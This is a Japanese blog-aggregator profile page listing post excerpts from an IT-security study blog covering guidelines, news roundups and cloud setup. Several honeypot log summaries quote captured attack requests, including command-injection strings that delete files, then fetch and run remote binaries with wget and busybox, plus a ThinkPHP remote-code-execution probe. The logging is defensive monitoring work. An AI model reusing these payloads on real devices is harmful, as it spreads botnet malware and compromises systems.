searchカテゴリー選択
chevron_left

カテゴリーを選択しなおす

cancel
プロフィール
PROFILE

iestudyさんのプロフィール

住所
未設定
出身
未設定

自由文未設定

ブログタイトル
家studyをつづって
ブログURL
https://www.iestudy.work/
ブログ紹介文
IT系の内容をブログにまとめていきます。 WindowsやLinux、ネットワークやセキュリティに関係することも試したら記事にします。また、ガイドラインの内容についても紹介していきます。
更新頻度(1年)

101回 / 365日(平均1.9回/週)

ブログ村参加:2019/06/09

本日のランキング(IN)
読者になる

新機能の「ブログリーダー」を活用して、iestudyさんの読者になりませんか?

ハンドル名
iestudyさん
ブログタイトル
家studyをつづって
更新頻度
101回 / 365日(平均1.9回/週)
読者になる
家studyをつづって

iestudyさんの新着記事

1件〜30件

  • フィッシング対策ガイドラインの比較(2020年版と2019年版)

    概要 フィッシング対策協議会では、フィッシング詐欺の被害を防ぐためにWebサービス事業者に向けた対策をまとめたガイドラインを公開しています。 www.antiphishing.jp 2020年度版では、最近の脅威動向を踏まえ対策要件を見直し、また、優先度の設定が見直されています。 また、ガイドラインの対策要件の中でも、ユーザがフィッシング被害を減らすために事業者が特に重点的に取り組むべきものを5つにまとめ公開しています。 https://www.antiphishing.jp/report/phishing_report_2020.pdf 関連記事:2019年度版 www.iestudy.wo…

  • 個人情報保護法の2020年改正について

    背景 色々なIT技術を使ったサービスが次々に登場し、個人情報を含む、様々な情報が活用されています。個人情報保護法ではそういった社会情勢を踏まえ、平成27年(2015年)より「いわゆる3年ごとの見直し」(附則第12条3項)を設けました。 個人情報保護法は前回の改正(施行は2017年)より3年が経過しており今年2020年に改正されます。 // 改定概要 個人の権利の在り方〇利用停止・消去等の個人の請求権について、不正取得等の一部の法違反の場合に加えて、個人の権利又は正当な利益が害されるおそれがある場合にも要件を緩和する。〇保有個人データの開示方法について、電磁的記録の提供を含め、本人が指示できるよ…

  • 2020年6月のIT・セキュリティトピック

    2020年6月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/06/01 外出自粛によるECサイト利用増でフィッシングも増(BBSS) //

  • Wowhoneypotログ分析(2020/05/23-2020/05/30)

    概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 // 対象期間 2020/05/23-2020/05/30 ログの集計 送信元 内容 検知数 0 103.113.106.15 \"GET / 1 103.145.12.53 \"GET / 1 103.50.5.230 \"GET / 1 104.248.33.135 \"GET / 1 104.248.92.71 \"GET / 1 106.12.132.21 \"GET / 1 110.154.247.40 \"GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1…

  • 「Guidelines for Securing Wireless Local Area Networks(WLANs)」の概要 NIST SP800-153

    Guidelines for Securing Wireless Local Area Networks(WLANs) NIST Special Publication 800-153 発行年月日:2012年2月 https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-153.pdf // 概要 このガイドラインは、NISTが企業の無線LAN環境をセキュアに利用するための推奨事項をまとめたものです。 章構成は以下の通りです。 Executive Summary1. Introduction1.1 Authori…

  • GCPのセキュリティ設定を監査してみた「Scout Suite」

    背景など 最近ではクラウドの利用が進んでおり、様々な企業がクラウド上にシステムを構築し、データを格納しています。 ascii.jp クラウドは常に新しい機能が開発されており、クラウドに対する理解が浅いままシステムを構築するとセキュリティの観点からは脆弱な設定になってしまっている場合があります。 また、一般的な脆弱性診断では、システムの脆弱性の有無は確認できますが、クラウド特有の設定項目(IAM等)に対しては対応できない場合があります。 そのため、クラウドの設定を監査できるサービス/ソリューションも多く提供されています。 サービスの例 esg.teldevice.co.jp it.impress…

  • 「政府情報システムにおけるクラウドサービスの利用に係る基本方針」の概要

    政府情報システムにおけるクラウドサービスの利用に係る基本方針 発行年月日:2018年6月7日 https://cio.go.jp/sites/default/files/uploads/documents/cloud_%20policy.pdf // 概要 内閣官房IT総合戦略室は、標準ガイドライン付属文書に「政府情報システムにおけるクラウドサービスの利用に係る基本方針」を追加しました。当該ガイドラインは、政府情報システムのシステムについて、クラウドサービスの採用をデフォルト(クラウド・バイ・デザイン)とし、クラウドサービス利用にあたってのガイドラインです。 クラウド・バイ・デフォルト原則に基…

  • Wowhoneypotログ分析(2020/05/18-2020/05/22)

    概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 // 対象期間 2020/05/18-2020/05/22 ログの集計 送信元 内容 検知数 0 105.155.16.59 \"POST /cgi-bin/mainfunction.cgi 1 114.67.202.10 \"GET /TP/public/index.php 1 =1"}">\"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1…

  • ネットワークセキュリティ製品のテスト基準を策定する「NetSecOpen」

    先日、Sonicwallの製品評価に関する記事を読みました。 blog.sonicwall.com 上記の記事に出てきた「NetSecOpen」について調べてみました。 // NetSecOpenとは NetSecOPENは、ネットワークセキュリティベンダー等が参加している、会員制の非営利団体で、ネットワークセキュリティ製品の評価または認証に使用できるテスト基準を策定することを目的に活動しています。 NetSecOpenのメンバー 評価指標 評価指標には以下のようなものがあります。 ブロック率 TCP同時接続率 アプリケーショントランザクション URL反応時間 最初のバイトを受信するのにかかる…

  • Wowhoneypotログ分析(2020/05/11-2020/05/17)

    概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 // 対象期間 2020/05/11-2020/05/17 ログの集計 送信元 内容 検知数 0 110.154.182.132 \"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 1 111.231.142.223 \"GET /TP/public…

  • 「働き方改革のためのテレワーク導入モデル」の概要

    働き方改革のためのテレワーク導入モデル 発行年月日:2019年6月発行者:総務省 https://www.soumu.go.jp/main_content/000616262.pdf // 概要と目的 「働き方改革のためのテレワーク導入モデル」は、テレワーク導入のためのノウハウやプラクティスをまとめて公開したものです。当該資料は、テレワーク導入にあたって、自社の「業種」と「企業規模」の軸で企業を分類し、さらにそこから、自社のテレワーク導入の状況と照らし合わせて、テレワーク導入にかかわる課題やその対処法を参考にするものです。 ガイドラインの読み進め方 テレワーク導入にかかわる課題 テレワーク導入…

  • Wowhoneypotログ分析(2020/05/01-2020/05/11)

    概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/05/01-2020/05/11 ※一部ログが取得できていない期間がありました。 ログの集計 送信元 内容 検知数 0 1.179.199.114 \"POST /cgi-bin/mainfunction.cgi 2 101.200.122.148 \"GET /cgi-bin/test-cgi 1 \"GET /console 1 \"GET /horde/imp/test.php 1 \"GET /login?from=0.000000 1 \"GET /login.action 1 \"GET…

  • 2020年5月のIT・セキュリティトピック

    2020年5月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/05/01 盗まれたZoomのログイン情報を売買する闇市場が活況 2020/05/01 重要インフラ分野の企業に侵害リスク調査を無償提供、マクニカネットワークス 2020/05/01 三井住友銀 7万件の情報紛失 2020/05/01 マスクの「無料配布」「本日入荷」メールは詐欺 マツキヨが注意喚起 2020/05/01 申請サイトに接続不能の持続化給付金 なりすまし詐欺に要注意、経産省も対処を急げ 2020/05/01 2万7千件の会員情報流出 鳥取市運営通販サイト 2020/05/02 「WebLogic…

  • Wowhoneypotログ分析(2020/04/25-2020/04/30)

    概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/04/25-2020/04/30 ログの集計 送信元 内容 検知数 0 1.70.13.251 \"POST /cgi-bin/mainfunction.cgi 1 103.209.1.230 \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}htt…

  • Hyper-v上にKali Linuxをインストールする

    概要 Hyper-v上にKali Linuxをインストールしました。今回記事にしたのは、Hyper-vの通常の仮想マシン作成手順でインストールした際に、Kali Linuxのインストールの途中「パッケージの選択とインストール」でエラーが発生しました。そこから試行錯誤しながらエラーが発生しない方法でインストールができたので、その内容をまとめます。 構築環境は以下の通りです。 ホストOS:Windows 10 Pro (1909) ゲストOS:Kali Linux 64-Bit 2020.1b // 手順(概要) Hyper-v上で仮想マシンを作成 Hyper-vで仮想マシンの作成を行います。以下…

  • (ようやく)モバイルPASMOを使ってみた

    今更ですが2020年3月18日より、モバイルPASMOのサービスが開始となりました。 japanese.engadget.com 個人的にはかなり期待していました。毎朝、定期券を忘れないように何度も確認しながらも、時々忘れて出てしまい、その度に高い昼ごはんが食べられそうな値段を払い続けていました。 その度にモバイルPASMOがいつか来るだろうと思ってスマホの機種変更ではNFC対応のものを選定していました。 // サービス開始当日は10時にアプリをインストールしていたのですが、いざ起動してみると「この機種は対応していない」旨のメッセージが表示され、使うことができませんでした。 モバイルPASMO…

  • セキュリティ業務を担う人材のスキル可視化施策について調べてみた

    セキュリティ業務を担う人材のスキル可視化ガイドライン 発行者:JNSA 発行年月日:2019年1月18日 https://www.jnsa.org/isepa/images/outputs/JTAG_guideline-%CE%B2_190118.pdf https://www.jnsa.org/isepa/images/outputs/JTAGreport2019.pdf // 目的 JNSAでは、経済産業省も公開しているセキュリティ人材の不足という課題に対して、組織が求める人材と、組織に属する人材のスキルのマッチングを行い、適材適所の人員配置や、適切な教育プランを作成等に資する取り組みを行…

  • Wowhoneypotログ分析(2020/04/21-2020/04/24)

    概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/04/21-2020/04/24 ログの集計 送信元 内容 検知数 0 108.68.60.225 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${…

  • Wowhoneypotログ分析(2020/04/16-2020/04/18)

    概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/04/16-2020/04/19 ログの集計 送信元 内容 件数 0 130.43.73.229 GET /shell?cd+/tmp;rm+-rf+*;wget+%20185.172.110.241/jaws;sh+/tmp/jaws 1 154.70.134.71 POST /cgi-bin/mainfunction.cgi 1 156.96.155.242 GET /admin/ 1 GET /dbadmin/ 1 GET /myadmin/ 1 GET /mysql-admin/ 1 GET…

  • GCPでWowhoneypotをたてる

    概要 Google Cloud Platfom上でWowhoneypotを構築し、取得したログをStackdriverで閲覧できるようにします。 // 構築 VMインスタンス作成 「Compute Engine」-「VMインスタンス」より、インスタンスを作成します。 今回はf1-micro、Ubuntu18.04で作成しました。 インスタンスの作成 SSH鍵生成 VMインスタンスに接続するためのSSHのカギを生成します。 今回はTeratermを使用しました。Teratermの場合、「設定」-「SSH鍵生成」より作成します。SSH鍵生成画面でコメントに入力したものがユーザ名となります。 「生成…

  • SASE(Secure Access Service Edge)とは

    SASEとは SASE(Secure Access Service Edge)はガートナー社が提唱しているセキュリティアーキテクチャで、昨今登場しているネットワークセキュリティソリューション(CASBやSWG等複数)をまとめて一つのソリューションとして提供するものを指しています。 SASEのイメージ // クラウドサービスの利用が進んでいる中で登場した考え方で、複数利用しているサービスに対してSASEから一元的にセキュリティポリシーをができます。 クラウド利用に関してはゼロトラストの考え方もありますが、SASEはゼロトラストの機能も含んだものとなります。 www.iestudy.work SA…

  • セキュリティに関連する法律一覧

    セキュリティで関連してくる法律についてまとめてみました。 // 不正アクセス禁止法 「不正アクセス禁止法」は、正式名称「不正アクセス行為の禁止等に関する法律」であり、2000年に施行されたインターネット上での不正なアクセスに関する法律のことです。 不正アクセスの定義は以下のようになっており、主になりすましと脆弱性をついた攻撃が含まれます。 4 この法律において「不正アクセス行為」とは、次の各号のいずれかに該当する行為をいう。一 アクセス制御機能を有する特定電子計算機に電気通信回線を通じて当該アクセス制御機能に係る他人の識別符号を入力して当該特定電子計算機を作動させ、当該アクセス制御機能により制…

  • 2020年4月のIT・セキュリティトピック

    2020年4月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/04/01 Marriott系列ホテル、520万人の顧客情報が流出の可能性 2020/04/02 ZoomのMac版、インストール時にマルウェア的な挙動 セキュリティ専門家が指摘 2020/04/02 日本国内のサイバー犯罪被害者数は年間2460万人、2019年調査(ノートンライフロック) 2020/04/02 ソニーミュージックの公式サイトが改ざん - 原因は調査中 //

  • AlexaでSwitchbotを操作する

    概要 Switchbotは普通の(アナログの)スイッチを「押す」という動作を行ってくれるデバイスです。スマートフォンのアプリや、専用のコントローラからBluetooth経由で操作ができるのですが、今回はすでに自宅にあるAlexaに呼びかけることで、Switchbotを操作できるような仕組みを作りました。概要は以下の通りです。 一連の流れ MQTTとは MQTTとはMessage Queue Telemetry Transportの略で、publish/subscribeモデルという仕組みに基づいてつくられた軽量なメッセージプロトコルです。ネットワークが不安定な場所や、性能が低いデバイスでも動く…

  • コンピュータセキュリティインシデント対応ガイド(NIST SP800 61)の概要

    コンピュータセキュリティインシデント対応ガイド(NIST SP800 61)を読んでみました。ガイドラインの概要をまとめます。 コンピュータセキュリティインシデント対応ガイド(NIST SP800 61)https://www.ipa.go.jp/files/000025341.pdf // 概要 このガイドラインは、組織がセキュリティインシデント対応機能を確立し、インシデントへの対応をを効率的に進められることを目的としたものです。セキュリティインシデント対応として、大きく以下の項目について解説されています。 コンピュータセキュリティインシデント対応能力の組織化 事件処理(初期の準備フェーズか…

  • 2020年3月のIT・セキュリティトピック

    2020年3月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/03/01 不正アクセスし人事評価を閲覧 磐田市主任を減給 /静岡 2020/03/02 カードショップBIG-WEB、平文パスワード含む会員情報流出(ホビーズファクトリー) 2020/03/02 ロリポップ!レンタルサーバーへの攻撃はSQLインジェクションが最多(JP-Secure) 2020/03/03 メールパスワード1件窃取、迷惑メール150万件送信(岡山大学) 2020/03/03 問い合わせフォームの内容が別ユーザにも表示、3年気づけず(南海電鉄) 2020/03/03 クレジットカード加盟店向け…

  • CISベンチマークについて

    自分の勉強のために、CISが公開している資料を読んでみました。 www.cisecurity.org // CISとは CIS(Center for Internet Security)は、セキュリティ推進のためのアメリカの非営利団体で、セキュリティの基準等を公開しています。 www.jiten.com CISベンチマークとは CISでは、AWSのセキュリティ設定のガイドとして、ベンチマークを公開しています。このベンチマークでは、チェック項目を確認することで、定量的な評価が可能となります。 各項目には以下の分類があります。Level1でかつSocredなものは設定が推奨と考えることができます。…

  • ゼロトラストについて調べてみた(NIST SP800-207)

    ゼロトラストについてNISTのガイドライン(ドラフト)が公開されていました。 Draft NIST Special Publication 800-207(Zero Trust Architecture) https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207-draft.pdf 従来のセキュリティモデルである境界防御(Perimeter Defense)に替わる新たなセキュリティモデルとして最近よく聞く言葉なので、自分の勉強のためにガイドラインを読んでみました。 // ガイドラインの構成 ガイドラインは以下の…

  • NIST SP800-40の概要

    概要 NIST SP800-40は、脆弱性とパッチの管理についてのガイドラインです。日本語版について、IPAでは「NIST SP 800-40 Version 2.0(パッチおよび脆弱性管理プログラムの策定)」を公開しており、ゾーホージャパン株式会社では「Revision 3(エンタープライズ向けパッチ管理技術ガイド)」を公開しています。 パッチおよび脆弱性管理プログラムの策定(Ver.2) http://ipa.go.jp/files/000025330.pdf エンタープライズ向けパッチ管理技術ガイド(Ver.3) https://www.manageengine.jp/solutions…

  • BYODにおけるセキュリティ対策の考え方

    私物端末の業務利用におけるセキュリティ要件の考え方 https://www.kantei.go.jp/jp/singi/it2/cio/hosakan/wg_report/byod.pdf // 概要 この資料では、BYOD(Bring Your Own Device=私物端末を業務に利用すること)におけるセキュリティの考え方を解説しています。この資料におけるBYODでは、端末にはスマートフォンやタブレットに加えてデスクトップPCも含んでおり、また、業務システムへのアクセス経路は特定していません。 BYODのイメージ BYODの検討にあたって この資料では、BYODの検討にあたって、以下のポイ…

カテゴリー一覧
商用